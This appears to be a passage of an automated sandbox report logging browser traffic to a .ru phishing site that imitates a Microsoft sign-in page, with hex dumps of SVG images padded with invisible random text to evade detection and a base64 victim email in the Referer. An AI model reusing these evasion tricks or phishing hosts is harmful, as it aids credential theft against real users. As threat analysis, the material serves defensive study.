                                                                                                                                                                                    2024-01-26 13:41:54 UTC653INData Raw: 31 38 31 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 45 45 73 63 64 37 53 72 7a 76 42 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65
                                                                                                                                                                                    Data Ascii: 1813<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">EEscd7SrzvB</text><g opacity=".2" clip-path="url(#E)"><text style
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 51 54 39 36 5a 38 58 73 4b 67 74 46 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e 36 7a 22 20 66 69 6c 6c
                                                                                                                                                                                    Data Ascii: ="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">QT96Z8XsKgtF</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4d 52 51 44 30 59 7a 54 4a 41 57 39 64 6f 5a 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c
                                                                                                                                                                                    Data Ascii: ="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">MRQD0YzTJAW9doZ</text><text styl
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 34 55 66 4b 44 56 37 33 65 37 6b 61 37 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20
                                                                                                                                                                                    Data Ascii: <stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">4UfKDV73e7ka7</text></radialGradient><text style="display: inline; color: #1A7D75; max-width:
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 58 4c 6a 65 76 6e 6a 67 42 54 6d 47 33 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35
                                                                                                                                                                                    Data Ascii: "#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">XLjevnjgBTmG3</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75
                                                                                                                                                                                    2024-01-26 13:41:54 UTC42INData Raw: 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 49 44 33 6d 41 70 41 33 4b 50 70 73 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: size: 0.02px;">ID3mApA3KPps</text></svg>
                                                                                                                                                                                    2024-01-26 13:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    45192.168.2.1649781104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:53 UTC786OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6oIPrEsjzA9/2y7aQ7c0EhFH7oS HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:54 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ev1ZfkK%2B2yCe%2FoJNpByIzWh%2Bi4WGH1M5liPTRFwJ%2FmPnll0r5bldja1qMAKvwEVie58xZQ1ukQg8QY98IpIVizmR67Xm6%2BZKHX71ervvtHK%2B8btX1mM4H6iSc4VuykWhkuHdnxuiYNb6n0qI%2FNbO9V%2F7%2BDY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d132b466749-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:54 UTC637INData Raw: 31 38 32 32 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4b 66 6a 50 61 30 67 36 76 64 4d 30 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79 6c
                                                                                                                                                                                    Data Ascii: 1822<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">KfjPa0g6vdM0</text><g opacity=".2" clip-path="url(#E)"><text styl
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 69 6c 6c 3d 22 75 72 6c 28 23 41 29 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 78 47 37 62 4e 62 73 74 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35
                                                                                                                                                                                    Data Ascii: ill="url(#A)"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">xG7bNbst</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 71 6e 33 57 49 71 6d 41 61 62 67 4a 30 64 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d
                                                                                                                                                                                    Data Ascii: "0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">qn3WIqmAabgJ0d</text><text style=
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 76 49 54 4a 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4d 5a 49 66 45 6c 51 53 42 48 43 74 4e 46 69 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35
                                                                                                                                                                                    Data Ascii: vITJ</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">MZIfElQSBHCtNFi</text></radialGradient><text style="display: inline; color: #1A7D75
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 46 66 70 39 7a 41 32 59 52 37 54 38 38 48 4b 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                                                                                                                                                    Data Ascii: stop stop-color="#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Ffp9zA2YR7T88HK</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inli
                                                                                                                                                                                    2024-01-26 13:41:54 UTC73INData Raw: 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 75 70 30 31 63 54 58 34 38 4a 33 46 79 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: 1px; max-height: 0.03px; font-size: 0.02px;">up01cTX48J3Fy</text></svg>
                                                                                                                                                                                    2024-01-26 13:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    46192.168.2.1649782104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:53 UTC782OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6ggGbKMm5p/3zCyDRX4zxDo HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:54 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ISQVVWAP%2BMFFbLBi87ve6sEwL37uN1y8anqmhwvF%2F5ztLEWFGFlr1s4PcGJh0Feu9xqjOztGdrC%2F0mRAQ6G7TLGSORutSnc1TLpvpsqc3hkf9RfKJ1uhzEaBRVlVZ6%2BCCVkVWPFm6TpNSZa3WRVROhhMNjo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d131bb312d2-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:54 UTC647INData Raw: 34 31 39 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 36 76 69 72 58 69 45 78 30 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20
                                                                                                                                                                                    Data Ascii: 419<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6virXiEx0</span><span style="display: inline;
                                                                                                                                                                                    2024-01-26 13:41:54 UTC409INData Raw: 36 31 37 2c 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34
                                                                                                                                                                                    Data Ascii: 617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404
                                                                                                                                                                                    2024-01-26 13:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    47192.168.2.1649785152.195.19.974436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:54 UTC709OUTGET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/illustration?ts=636978479848606228 HTTP/1.1
                                                                                                                                                                                    Host: aadcdn.msauthimages.net
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:55 UTC690INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                    Content-MD5: 6Biw5Vx6HYxPQErt0rREAQ==
                                                                                                                                                                                    Content-Type: image/*
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Etag: 0x8D7008D750EA59B
                                                                                                                                                                                    Last-Modified: Thu, 04 Jul 2019 14:39:45 GMT
                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: bd572877-701e-0066-475d-509e68000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    Content-Length: 135326
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:55 UTC15695INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 05 04 04 04 04 03 05 04 04 04 06 05 05 06 08 0d 08 08 07 07 08 10 0b 0c 09 0d 13 10 14 13 12 10 12 12 14 17 1d 19 14 16 1c 16 12 12 1a 23 1a 1c 1e 1f 21 21 21 14 19 24 27 24 20 26 1d 20 21 20 ff db 00 43 01 05 06 06 08 07 08 0f 08 08 0f 20 15 12 15 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 ff c0 00 11 08 04 37 03 65 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 08 09 ff c4 00 4c 10 00 01 03 03 02 04 04 03 05 05 07 03 03 03 00 0b 01 00 02 03 04 05 11 12 21 06 31 41 51 07 13 22 61 14 71 81 32 42 91 a1 b1 15
                                                                                                                                                                                    Data Ascii: JFIF,,C#!!!$'$ & ! C 7e"L!1AQ"aq2B
